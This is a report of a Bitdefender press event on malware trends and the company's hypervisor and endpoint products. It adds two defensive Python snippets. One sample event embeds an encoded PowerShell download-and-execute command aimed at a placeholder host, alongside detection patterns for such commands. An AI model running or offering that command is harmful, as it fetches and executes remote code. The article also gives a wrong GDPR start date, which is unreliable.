Bitdefender describes the current bleak picture of computer threats and presents future trends, illustrating the innovative methods that will enable businesses to deal with increasingly complex malware and targeted attacks.
In recent days Bitdefender organised an interesting press conference in Milan, in which we participated. The company’s spokesperson (Bitdefender is a worldwide specialist in IT security technologies and an innovative solutions provider whose products protect more than 500 million users in more than 150 countries) painted the current scene and presented future trends, explaining which strategies can be put in place to protect against new and increasingly complex threats.
Security is a top priority for any business (or at least it’s supposed to be …). Targeted attacks, which are increasingly widespread, can be exploited by cyber-criminals to carry out industrial espionage, to steal intellectual property or confidential information, or simply to cause serious damage (such as the loss of data).
Data, including personal information, has in fact become vital for the global economy. Properly protecting company data and that of customers is the key to gaining a competitive edge, protecting and expanding the business, and preserving the freedom to communicate.
On the 25th December 2018 the new General Data Protection Regulation (GDPR), drawn up by the European Commission last year, will come into effect, focusing on the obligations of those who process the data of European Union residents.
The GDPR makes a significant push for investment in security solutions and data protection. The latter part of the year and early part of the next will be the best time for companies to reflect on their policies for the defence of information stored within their infrastructure.
Consider that while cybercrime in Italy grew by 13.3% compared to last year, espionage and sabotage, as unfortunately is always the case in our country, leapt by 127%.
In the report prepared by Clusit, the Italian Association for Computer Security, 2011 was named the annus horribilis for security; 2017, however, turned out even worse, confirming that our markets are completely inadequate.
The framework for current and future cyber threats according to Bitdefender
During 2017 we’ve witnessed the spread of malware developed from code stolen from government agencies (presumably the American NSA). These are exploits often unknown to security solution vendors and able to evade conventional security tools.
Threats like WannaCry and GoldenEye have caused a lot of damage between the second and third quarter of this year by blocking the activity of entire companies and causing unprecedented operating losses.
Malware capable of lateral movement (i.e. able to spread within the local network using shared folders and user privileges) has become increasingly common. Exploits known by the names of EternalBlue and EternalRomance have been repeatedly used by cyber-criminals to “carve out” footholds inside vulnerable corporate networks and from there monitor the traffic inside the victim’s network (with the ability to observe and take information).
Bitdefender has also recorded a growing interest among malware writers in open-source and freeware tools, “artfully” modified and integrated into customised packages.
These tools are more and more “popular” in APT (advanced persistent threat) attacks, which are designed to find a privileged “gateway” into a company, starting for example with a malware campaign targeted at users or administrators whose systems are connected to the company LAN. Security measures that don’t rise to the occasion, shared resources that are not adequately protected, and accounts with too many rights can lead to a complete debacle, leaving the whole network exposed to an attack that initially succeeded on a single workstation or endpoint.
Bitdefender uses over 500 million sensors and honeypots to detect emerging threats promptly and has immediate visibility of even the smaller cyber-attacks that seek to overcome security controls.
Looking at the statistics, one in six spam emails contains some form of ransomware, and ransomware designed specifically to target companies is now a reality.
2017 was also the year of illicit cryptocurrency miners, malware that uses various techniques to infect users’ systems and lateral movement to spread inside corporate networks.
According to Bitdefender’s engineers, over the next year new exploits taken from government agencies will emerge, and will probably be used for disruptive attacks. Lateral movement, moreover, will become standard in most malware. Tools for obtaining passwords, such as Mimikatz, are getting better and better and can be combined with wormable vulnerabilities.
Increasingly popular will be so-called fileless attacks which, unlike traditional attacks, are not based on dropping, storing and executing a malicious file on the file system.
The term fileless, in fact, does not mean that no file is used at all during the attack, but rather that nothing needs to be saved locally on the victim’s system to trigger the infection.
With Windows 10 becoming increasingly popular, Bitdefender explains, it is reasonable to expect an increase in attacks based on PowerShell scripts or on the new Linux Bash.
According to Bitdefender technicians, ransomware will begin to spread that uses the computing power of modern GPUs to act faster and to try to evade detection by anti-malware products.
The use of polymorphism as a tool will gain an even stronger foothold. Attackers are already accustomed to using cloud-based polymorphic engines to flood the network with unique variants of the same malware and make detection even harder.
On the one hand this generates samples designed to produce “false positives”; on the other it inflates the malware payload so that it can pass unnoticed by the majority of security solutions.
Unfortunately the spread of botnets composed of Internet of Things (IoT) devices with vulnerable firmware, or otherwise inadequately protected, will become more and more common. Last but not least, Bitdefender foresees that 2018 will be the year in which malware writers devote even greater effort to attacking macOS.
Bitdefender Hypervisor Introspection, for protection against advanced attacks
During the presentation held in Milan a few days ago, Bitdefender presented its new solution to help businesses protect against advanced attacks: Hypervisor Introspection.
Liviu Arsene, senior e-threat specialist at Bitdefender, explained that there are some aspects of today’s computer security landscape that managers and business decision makers should understand. In particular:
– Known and unknown vulnerabilities can be used by cyber-criminals to breach the company’s infrastructure.
– There are exploits kept secret by government agencies (but often recovered and reused in targeted attacks) which can be used for mass attacks such as APTs.
– An unaddressed vulnerability can potentially expose the data of millions of customers or users.
– Current endpoint security solutions are often inadequate for responding quickly to new threats.
Bitdefender Hypervisor Introspection (HVI) is the first solution (developed in conjunction with Citrix) capable of exposing memory breaches that endpoint security tools fail to recognise, analysing raw memory directly and ensuring that it is not altered by malware.
The protection provided by HVI is particularly interesting and effective because it is external to the operating system: nothing needs to be installed on each workstation or server, since it operates at the hypervisor level.
Bitdefender HVI relies on hardware-enforced isolation and cannot be disabled or compromised by rootkits or other threats in the operating system kernel.
By way of example, Arsene demonstrated how Bitdefender’s solution is able to quickly block any threat capable of lateral movement, such as EternalBlue.
And precisely because it does not rely on an agent installed in the guest, HVI is compatible with any security solution in use at the enterprise level and is capable of producing an alert as soon as a memory violation is detected, providing a detailed report on the sequence of the attack, with an indication of the processes affected, the type of violation, and the history of the attack.
HVI changes the approach to the security problem, focusing on the techniques used in modern attacks and blocking heap spray attacks, code injection, function detouring, API hooking, and so on.
In addition to having minimal impact on performance, HVI allows you to eliminate weaknesses in corporate network security and in the devices connected to it.
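As an added illustration of what “analysing raw memory” for function detouring and API hooking can mean in practice, here is a small Python check of my own (not Bitdefender’s HVI code) that compares a function’s live prologue with a trusted snapshot and classifies the common x64 detour stubs; the addresses and prologue bytes are constructed for the example.

```python
import struct

# Constructed sample, not from the article: the first 15 bytes of a typical MSVC x64
# function prologue (mov [rsp+8],rbx ; mov [rsp+10h],rsi ; push rdi ; sub rsp,20h) as
# recorded in a trusted snapshot, and the same bytes after an in-guest hook engine
# overwrote the function start with a 5-byte relative jump to a trampoline.
FUNC_VA = 0x7FF812345000        # assumed load address of the function
TRAMPOLINE_VA = 0x7FF811000000  # assumed address the detour jumps to
CLEAN_PROLOGUE = bytes.fromhex("48895c2408" "4889742410" "57" "4883ec20")
HOOKED_PROLOGUE = (b"\xe9" + struct.pack("<i", TRAMPOLINE_VA - (FUNC_VA + 5))
                   + CLEAN_PROLOGUE[5:])

MASK64 = (1 << 64) - 1


def detect_detour(code, va):
    """Classify the first instruction at va as a known detour pattern.

    Returns (kind, target) or None if the bytes do not start with a control
    transfer. Targets are computed the way the CPU would resolve them.
    """
    if len(code) >= 5 and code[0] == 0xE9:                      # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return ("jmp_rel32", (va + 5 + rel) & MASK64)
    if len(code) >= 6 and code[:2] == b"\xff\x25":              # jmp [rip+disp32]
        disp = struct.unpack_from("<i", code, 2)[0]
        return ("jmp_rip_indirect", (va + 6 + disp) & MASK64)   # slot holding the pointer
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:  # push imm32 ; ret
        return ("push_ret", struct.unpack_from("<I", code, 1)[0])
    if len(code) >= 12 and code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":
        return ("mov_rax_jmp", struct.unpack_from("<Q", code, 2)[0])  # mov rax,imm64 ; jmp rax
    return None


def verify_function(reference, live, va):
    """Compare the live prologue with the trusted snapshot, as a monitor reading raw
    guest memory from outside the OS would, and report how it was altered."""
    if live == reference:
        return {"altered": False, "detour": None}
    first_diff = next(i for i, (a, b) in enumerate(zip(reference, live)) if a != b)
    return {"altered": True, "first_diff": first_diff, "detour": detect_detour(live, va)}
```

On real images the reference must be the module as loaded (after relocation), and legitimate hot-patching has to be allow-listed, otherwise a raw byte comparison is noisy.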
Bitdefender’s proposal for effectively protecting endpoints
Denis Cassinerio, regional sales director for Bitdefender Italy, then turned the spotlight on the endpoint protection solution.
As we mentioned in the introduction, endpoints will obviously continue to be the preferred “gateway” of cyber-criminals to the company structure.
Suffice it to say that 62% of malware is installed with the classic “double-click” on malicious attachments received by e-mail, and that 92% of phishing attacks are followed by the installation of some malicious software on the user’s client.
Fileless attacks, which don’t save any file at the file system level, rely instead on RAM and the Windows registry, and take advantage of web browser flaws when you visit web pages that host exploit kits or use outdated versions of browser plug-ins.
Using this approach, the malicious code is simply downloaded and executed directly from memory.
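To make the fileless pattern described here (and in the trends section above) concrete from the defender’s side, here is an added example of my own, not Bitdefender’s or the article’s, that triages constructed endpoint events for exactly those traits: a PowerShell launch with a hidden window and an encoded in-memory download cradle, and a registry Run value that invokes a script host. The Sysmon-style field names and the sample events are assumptions made for this example.

```python
import base64
import re
# Constructed sample events, not from the article: the shape imitates the process-creation
# and registry-set records a Windows sensor such as Sysmon emits (field names assumed).
PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# -EncodedCommand takes the base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"type": "process", "image": PS_EXE, "cmdline": "powershell.exe Get-Process"},
    {"type": "process", "image": PS_EXE,
     "cmdline": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}"},
    {"type": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
     "value": "Updater", "data": "mshta vbscript:Execute(\"CONSTRUCTED_PLACEHOLDER\")"},
]
# Markers of code fetched and run in memory ("download cradles", expression evaluation).
CRADLE_RE = re.compile(r"DownloadString|DownloadData|Invoke-Expression|\bIEX\b|FromBase64String", re.I)
# Script hosts that turn a registry value into running code without a file on disk.
HOSTS_RE = re.compile(r"\b(powershell|mshta|wscript|cscript|rundll32|regsvr32)\b", re.I)

def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand (-e/-ec/-en/-enc) argument, or ''."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace") if m else ""
    except ValueError:  # malformed base64 (binascii.Error is a ValueError subclass)
        return ""

def score_event(ev):
    """Return the indicator names raised by one event (empty list = nothing flagged)."""
    hits = []
    if ev["type"] == "process" and ev["image"].lower().endswith("powershell.exe"):
        cmd = ev["cmdline"]
        if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
            hits.append("hidden_window")
        decoded = decode_encoded_command(cmd)
        if decoded:
            hits.append("encoded_command")
        if CRADLE_RE.search(cmd) or CRADLE_RE.search(decoded):
            hits.append("download_cradle")
    elif (ev["type"] == "registry" and HOSTS_RE.search(ev["data"])
          and ev["key"].endswith(("\\CurrentVersion\\Run", "\\CurrentVersion\\RunOnce"))):
        hits.append("run_key_script_host")
    return hits

def triage(events):
    """Map the index of each flagged event to its indicators; clean events are left out."""
    return {i: hits for i, ev in enumerate(events) if (hits := score_event(ev))}
```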
Bitdefender offers an integrated solution – GravityZone Endpoint Security HD – which uses an adaptive approach on each endpoint and, thanks to the HyperDetect module, provides pre-execution protection against malware and runtime protection against fileless attacks.
Bitdefender HyperDetect relies on tried-and-tested machine learning models, on solid heuristics, and on detecting threats by monitoring their behaviour.
The new solution presented by Bitdefender is therefore an excellent response to targeted attacks (APT), suspicious files and network traffic (macros, scripts, …), exploit code, ransomware and greyware (software that falls into the grey area between malware and legitimate programs).
The innovative approach presented by Bitdefender will certainly help companies gear up in time for the requirements laid down by the new European regulation (GDPR), effectively protecting their data and digital identities.